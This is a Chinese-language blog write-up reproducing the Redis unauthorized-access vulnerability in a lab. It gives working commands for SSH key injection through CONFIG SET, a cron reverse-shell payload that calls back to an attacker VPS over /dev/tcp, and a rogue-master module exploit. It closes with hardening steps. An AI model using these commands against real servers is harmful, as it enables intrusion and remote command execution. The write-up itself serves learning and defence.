Redis是什么?
Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。
Redis未授权访问漏洞
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
影响版本
影响版本Redis未授权访问在4.x/5.0.5版本以下
攻击手段
1.直接未授权访问,对redis数据库的操作
2.ssh免密钥登录(有思维导图)
3.对redis数据库写马子拿shell,与第二点条件和思路差不多
4.写进反弹shell,设置反弹时间反弹。
5.利用现有exp
环境
攻击机为192.168.10.144 靶机为192.168.10.158
攻击和靶机都需要安装redis环境。
攻击工具下载
- 下载压缩包
wget http://download.redis.io/releases/redis-4.0.11.tar.gz - 解压
tar -zxvf redis-4.0.11.tar.gz - 编译
cd redis-4.0.11 # 切换
make # 编译
如果要使用连接的话,要进入安装的目录然后./后执行即可,可以-h看看配置如何使用
root@kali:~/redis-4.0.11/src# ./redis-cli -h
但是
解决的方法是root@kali:~# sudo cp redis-4.0.11/src/redis-cli /usr/local/bin/
(授予redis-cli一个全局使用的权限)
当然了每个人的目录都是不一样的,所以根据自己的情况分析
靶机漏洞环境准备:(已经搭建好vulhub)
root@kali:~/vulhub/redis/4-unacc# docker-compose up -d
至此环境已经构建完成
攻击机进攻复现(一)
如果只是漏洞挖掘,不深入拿shell,以下步骤即可。
对靶机的一个6379redis的端口探测
root@kali:~# nmap -p 6379 -script redis-info 192.168.10.158
- 进行未授权访问连接
root@kali:~# redis-cli -h 192.168.10.158
如图所示,已经连接上靶机的redis数据库,可以对其进行一些数据库的操作。
其中redis数据库的一些操作
dbsize 查看所有key的数目
flushdb 删除当前选择数据库中的所有key
flushall 删除所有数据库中的所有key
save: 将数据同步保存到磁盘
bgsave: 异步保存
lastsave: 上次成功保存到磁盘的Unix时间戳
info: 查询server信息
config: 配置server
slaveof: 改变复制策略设置
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
方法二:(需root权限)导入ssh,面密钥登录(失败
攻击机,对ssh生成一个空密码
root@kali:~# ssh-keygen -t rsa
如图所见,生成的密码保存在/.ssh目录下
切换到.ssh/的目录,可见的确生成了rsa的密钥,需要把该密钥复制到一个文本中
root@kali:~/.ssh# (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > AuFeng.txt
把该文本传输到靶机上
root@kali:~/.ssh# cat AuFeng.txt | redis-cli -h 192.168.10.158 -x set ok
然后登录靶机redis,然后把路径修改为root/.ssh
redis-cli -h 192.168.10.158
Config set dir修改路径的时候,发现该以下error问题,说明该redis不是以root权限启动的话,是无法修改路径的,这样的话,该漏洞也无法使用。
没办法了,我在靶机使用 sudo 启动漏洞环境,还是失败
在这里只能说说如果redis是root权限下操作的大体的思路:
参考文章: https://www.freebuf.com/vuls/162035.html
这篇文章是我5月份的时候写的,现在7月18号,因为攻防演练,让我意识到redis未授权这一块知识需要重新补充,所以在自己的服务器上搭建了redis环境,也思考了如何避免redis未授权的漏洞
方法二:导入ssh,免密钥登录(实战成功
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > AuFeng.txt
- 1
root@kali:~/.ssh# cat AuFeng.txt |redis-cli -h 目标ip -x set crack
OK
先set dir到 ssh生成公、密钥的路径/root/.ssh下,然后把上传的文件设置为authorized_keys,然后save就ok了, 为什么如此设置? 一般ssh生成公、密钥的路径都会在/root/.ssh目录下,一般ssh免密钥登录都是/root/.ssh中的authorized_keys作为认证登录的文件。
最后一步记得要save,很关键。
实现免密钥登录
方法三 利用计划任务执行命令反弹shell(需root权限)
有时候 目标服务器没有使用过ssh,就没有/.ssh 这个目录
但是能用set 证明是root权限,所以可以利用计划任务执行命令反弹shell
/var/spool/cron/这个目录是以账号来区分每个用户自己的执行计划
root用户执行的就会在/var/spool/cron/下面创建root文件
set xx "\n* * * * * bash -i >& /dev/tcp/自己vps的ip/1234 0>&1\n"
- 1
方法四 使用已有的exp执行远程命令执行(非root权限)
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
步骤如下,先下载好exp。
root@kali:~# git clone https://github.com/vulhub/redis-rogue-getshell
- 1
然后进入到RedisModulesSDK/目录进行一个编译
root@kali:~/redis-rogue-getshell# cd RedisModulesSDK/
root@kali:~/redis-rogue-getshell/RedisModulesSDK# make
- 1
- 2
最后直接打exp
root@kali:~/redis-rogue-getshell/RedisModulesSDK# python3 redis-master.py -r 192.168.10.158 -p 6379 -L 192.168.10.144 -P 8888 -f RedisModulesSDK/exp.so -c "id"
- 1
可见,redis运行的权限不是root。
遗憾:
由于环境搭建的问题上浪费了许多的时间,最后因为运行的权限问题(还是没有解决),导致无法复现使用ssh免密钥登录、还有redis反弹shell的实现。
参考文章(https://www.freebuf.com/column/158065.html)
修复方案(重启redis才能生效)
重启很重要,不是说关了重新启动就可以了,需要如下操作才能正常重启
[root@localhost src]# ./redis-server ../redis.conf
- 1
修复操作如下:
进入redis配置文件redis.conf
ip绑定,不允许除本地外的主机远程登录redis服务 将#注释去掉
开启保护模式,不允许远程连接redis服务将no 改为yes
修改默认端口
以低权限运行 Redis 服务(重启redis才能生效)切身体会
为 Redis 添加密码验证(重启redis才能生效)